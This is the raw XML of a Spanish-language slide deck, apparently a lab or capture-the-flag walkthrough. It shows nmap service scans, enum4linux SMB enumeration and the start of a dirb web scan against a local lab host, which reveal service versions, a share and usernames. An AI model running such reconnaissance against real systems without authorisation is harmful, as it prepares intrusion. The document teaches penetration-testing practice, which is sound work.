                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Nos dan los puertos TCP confirmados:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hhtp</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netbios-ssn</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Microsoft-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ds</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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CDDF871E-861B-42FA-80CB-FEFB174C495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267450" y="2995498"/>
            <a:ext cx="4754563" cy="2146529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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AFA7BA3-340F-4D67-AD14-C6BF392B6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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77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62333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89FFC3-5696-4E2F-9087-D7B3F7720B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b="1" dirty="0"/>
              <a:t>Reconocimiento de Puertos:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> 22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>, 80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>.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3127B54-2EF3-45B7-B17E-99C7195F8C1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r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-p22 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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172.17.0.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Servicio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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6.6.1p1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-p80 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Servicio http: Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 2.4.7 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-title “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Andy´s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>house</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”, y que soporta solo GET ,POST ,OPTIONS ,HEAD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Es interesante remarcar que soporta descargar ficheros con GET; y POST solicita que el recurso de destino procese la representación incluida en la solicitud de acuerdo con la semántica específica del recurso.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7D6E52C8-D311-4F31-A3AB-99E41F639AB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080760" y="3173507"/>
            <a:ext cx="5389721" cy="255494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9E578125-6F04-4391-9119-A907D972C4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0760" y="3571388"/>
            <a:ext cx="5401524" cy="1255885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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AEC53E0-BC17-482B-ABAC-729E6E1DB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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77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012790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BCD28A-4A39-48E9-B39F-315288198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b="1" dirty="0"/>
              <a:t>Reconocimiento de Puertos 139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>, 445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1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A8F4275-9533-45C8-9B37-68927C5B109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s-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-p139,445 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Los trataremos juntos debido a que los puertos TCP 139 y TCP 445 están relacionados porque ambos se utilizan para el protocolo SMB, que permite el uso compartido de archivos e impresoras en redes.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ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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En ambos casos es el servicio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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netbios-ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 concretamente el Samba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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smbd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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3.X – 4.X en 139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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y 445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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con samba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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smbd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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4.3.11.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1CF8EF78-9D69-45F0-90BE-0D84FEB62B5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267450" y="3836895"/>
            <a:ext cx="5035368" cy="439242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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FA65ED0-0065-4ABC-A411-32CF1E917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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77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585687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A7A3BF-F33B-4E8E-8D98-AB7729B5C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b="1" dirty="0"/>
              <a:t>Enumeración SMB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A5FAA74-7BA7-41A2-933E-F1E8AFFDE94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ES" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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enum4linux -a 172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1700" b="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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De los recursos compartidos de enumerados obtenemos que no hay Workgroups conocidos y que únicamente hay un directorio IPC$ que lleva los propios servicios de samba.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Y un directorio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1700" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sambashare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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de tipo disco que podría llevar los directorio o archivos compartidos.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ES" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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En la imagen se muestra que es posible la existencia de un usuario local del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1700" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sitema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1700" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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andy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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(como el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1700" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-title en el http) y otro usuario llamado lucas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" b="1" dirty="0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FDD6F805-8DFF-495F-889E-D83C4312DED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19480" y="2595381"/>
            <a:ext cx="4754563" cy="1286337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C1968F21-0557-44F2-AE15-BA0DBEA9D9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4511139"/>
            <a:ext cx="5401524" cy="627942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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27AA30B-88EC-431B-A636-390A09BF01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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77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173545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D6644C-B270-4436-94AD-3E9181ADEF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b="1" dirty="0"/>
              <a:t>Enumeración HTTP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3664102-6F27-4522-BC40-6A2D01C9BBD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s-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
